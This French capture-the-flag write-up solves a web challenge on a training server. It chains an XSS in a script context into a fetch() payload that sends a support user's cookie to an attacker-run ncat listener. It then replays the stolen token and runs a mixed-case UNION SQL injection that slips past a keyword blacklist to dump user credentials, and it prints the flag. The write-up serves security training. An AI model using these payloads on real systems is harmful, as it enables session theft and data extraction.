# WRITEUP Ticket


## Catégorie :

`Web`

## Consigne :

```
Identifier les vulnérabilités de ce site pour trouver le flag

nota: le bruteforce n'est pas autorisé

http://game195.marshack.fr:5000



```

## Pièce(s) jointe(s) :

```
Néant
```

## Serveur :

```
Game1
```

## Points attribués :

```
medium
```

## Hint : 

```
Néant
```

## Flag :

```
fl@g{85d58121eb955c59a2c29a5db40e774e}
```

## Solution : 

L'objectif de ce challenge consiste :
- à voler le cookie du service *support*  en exploitant une faille XSS
- puis à récupérer le flag dans la base de données en réalisant une injection SQL
 

#### Etape 1 : vol du cookie


dans un navigateur saisir le lien fourni dans la consigne : http://game195.marshack.fr:5000

![](img-writeup/image-20240318083243757.png)

Créer un utilisateur en cliquant sur *Register*

![](img-writeup/image-20240318084259157.png)

Après avoir créé l'utilisateur *noname* , utiliser ce compte pour se connecter 

![](img-writeup/image-20240318084358718.png)

On arrive sur l'espace de Ticketing, on Déclare un Ticket en cliquant sur *Add Ticket*

![](img-writeup/image-20240318084506026.png)

Renseigner le ticket en déclarant un *Title* puis cliquer sur submit

![](img-writeup/image-20240318084908242.png)

Cliquer sur *LINK*

![](img-writeup/image-20240318084953645.png)

On obtient l'erreur suivante :

![](img-writeup/image-20240318085151072.png)

En visualisant le code source, on extrait la section la plus intéressante

```
 1       <script>
 2         (function(){
 3           const yogosha_env = {
 4             env: "internal"
 5           };
 6           try {
 7             if (yogosha_env) {
 8               return;
 9             }
10           // WE are still trying to fix this issue here: 192.168.120.195:5000/ticket/monticket
11           } catch {
12             fetch("/error", {
13               method: "POST",
14               body: {
15                 url: "https://192.168.120.195:5000/ticket/monticket"
16               }
17             });
18            }
19          })()
20        </script>
```

on constate que le *titre* du ticket saisi précédemment apparaît à 2 endroits
```
Ligne 10 : // WE are still trying to fix this issue here: 192.168.120.195:5000/ticket/monticket
                                                                                      ^^^^^^^^
Ligne 15 : url: "https://192.168.120.195:5000/ticket/monticket"
                                                     ^^^^^^^^ 
```

Construction d'un payload comme preuve de concept

```
"-alert()-"%E2%80%A8let%20yogosha_env

    ce payload agit :
       sur la ligne 10   :  une erreur est provoqué car on tente de redéfinir la constante yososha_env.
	                        ce que n'autorise pas javascript 
                            du coup, le programme se poursuit dans la section catch

	   sur la ligne 15 : le payload affiche la boite d'alerte : alert() 						

nota : 
    0xE2 0x80 0xA8  séparateur de ligne
```

on ajoute le ticket avec le payload

![](img-writeup/image-20240318101907093.png)

Cliquer sur *LINK*

![](img-writeup/image-20240318102155195.png)

bingo, on a bien la boite alert() qui s'affiche

![](img-writeup/image-20240318102038903.png)

il s'agit maintenant de construire un payload qui va permettre de voler le cookie du service *Report*

```
payload:
"-fetch(%27http%3A%2F%2F[web_hook]%2F%3Fcookie%3D%27%2BencodeURIComponent%28document.cookie%29%2C%20%7B%20mode%3A%20%27no-cors%27%20%7D)-"%E2%80%A8let%20yogosha_env

Remplacer [http://web_hook:port] par votre machine en écoute

Dans cet exemple, j'utilise le port 1337

Attention:
   il faut encoder l'url
      http%3A%2F%2Fxxx.xxx.xxx.xxx%3A1337
   Remplace xxx.xxx.xxx.xxx par votre adresse ip 

on obtient ceci :

"-fetch(%27http%3A%2F%2Fxxx.xxx.xxx.xxx%3A1337%2F%3Fcookie%3D%27%2BencodeURIComponent%28document.cookie%29%2C%20%7B%20mode%3A%20%27no-cors%27%20%7D)-"%E2%80%A8let%20yogosha_env
```

Exemple  ip 172.16.1.130 et port 1337
```
"-fetch(%27http%3A%2F%2F172.16.1.130%3A1337%2F%3Fcookie%3D%27%2BencodeURIComponent%28document.cookie%29%2C%20%7B%20mode%3A%20%27no-cors%27%20%7D)-"%E2%80%A8let%20yogosha_env
```

![](img-writeup/image-20240318105140854.png)

Mettre en écoute votre host 

``` 
ncat --keep-open -l  172.16.1.130  1337
```

Transmettre le Ticket au service Report

![](img-writeup/image-20240318114057278.png)

nous obtenons le *token* du service support

![](img-writeup/image-20240318114148899.png)

On remplace la valeur du cookie nommée *token* par la valeur ci-dessous :
```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInVzZXJuYW1lIjoic3VwcG9ydF9pdCIsInJvbGUiOiJzdXBwb3J0IiwiaWF0IjoxNzEwNzU4MzkzfQ.1iykBx5ULHLLjxJvk2lUSYDLD935LkjdhFfcGf5SstM
```

Firefox permet de modifier les cookies :
  outils du navigateur ->  outils de développement web


![](img-writeup/image-20240318115439175.png)

Double-cliquez sur le champ *valeur* et copier/coller le cookie du service support

Actualiser la page, on est automatiquement redirigé sur la page du service support

`http://game195.marshack.fr:5000/support_hotline`

![](img-writeup/image-20240318122625800.png)

La première phase concernant la récupération du cookie du service support est terminée

Maintenant on passe à l'injection SQL

#### Etape 2 injection SQL

La page support est vulnérable à une injection SQL

En cliquant sur le bouton *View resolved*  on obtient la page suivante :

![](img-writeup/image-20240318125504842.png)

On teste quelques commandes d'injection

`http://game195.marshack.fr:5000/support_hotline?type='`

On obtient l'erreur suivante, c'est vraisemblablement que la page est vulnérable à une injection sql

![](img-writeup/image-20240318130600082.png)

`An error Occured during handling your request`

On réalise une deuxième injections :

`http://game195.marshack.fr:5000/support_hotline?type=' and 1=1 -- -`

 ![](img-writeup/image-20240318130713214.png)

`Bad input was detected Stopping processing the request`

Le message indique vraisemblablement que certaines commandes ou opérateurs sont blacklistés

En réalisant plusieurs tests, on peut tenter de déterminer les commandes ou opérateurs blacklistés 

- `http://game195.marshack.fr:5000/support_hotline?type=union` blasklisté      
- `http://game195.marshack.fr:5000/support_hotline?type=UNION` blacklisté
- `http://game195.marshack.fr:5000/support_hotline?type=Union` *autorisé*

- `http://game195.marshack.fr:5000/support_hotline?type=select` blasklisté
- `http://game195.marshack.fr:5000/support_hotline?type=SELECT` blasklisté
- `http://game195.marshack.fr:5000/support_hotline?type=Select` *autorisé*

etc ....

On constate que si les commandes SQL comporte des majuscules et de minuscules, les commandes sont autorisées 

En continuant les tests, on peut déterminer la blacklist
```
Enumerating the blacklisted strings, we get: ["," , "=" , "UNION" ,"union","SELECT","select","FROM","from"]
```

Détermination du nombre de champs composant la table.

- `http://game195.marshack.fr:5000/support_hotline?type='order by 1 -- -` ok
- `http://game195.marshack.fr:5000/support_hotline?type='order by 2 -- -` ok
- `http://game195.marshack.fr:5000/support_hotline?type='order by 3 -- -` ok
- `http://game195.marshack.fr:5000/support_hotline?type='order by 4 -- -` ok
- `http://game195.marshack.fr:5000/support_hotline?type='order by 5 -- -` ok
- `http://game195.marshack.fr:5000/support_hotline?type='order by 6 -- -` ok
- `http://game195.marshack.fr:5000/support_hotline?type='order by 7 -- -` *error: An error Occured during handling your request*

On peut maintenant tenter de créer des requêtes plus élaborées

Détermination des champs affichés dans la page

`http://game195.marshack.fr:5000/support_hotline?type=' uNioN (SeLecT * fRom (SeLeCt 1) as A join (SeLeCt 2) as B join (SeLeCt 3) as C join (SeLeCt 4) as D join (SeLeCt 5) as E join (SeLeCt 6) as F)-- -`

![](img-writeup/image-20240318133324844.png)


On imagine que la tables se nomme users et que les champs user et password exisent. 

Requête pour afficher les champs de la table users


`http://game195.marshack.fr:5000/support_hotline?type=resolved' UnIoN (sElEcT * fRoM (sElEcT 1) AS A JOIN (sElEcT username fRoM users) AS B JOIN (sElEcT password fRoM users) AS C JOIN (sElEcT 4) AS D JOIN (sElEcT 5) AS E JOIN (sElEcT 6) AS F)-- -`


![](img-writeup/image-20240318133229170.png)

Le flag apparait dans la colonne Département

`fl@g{85d58121eb955c59a2c29a5db40e774e}`

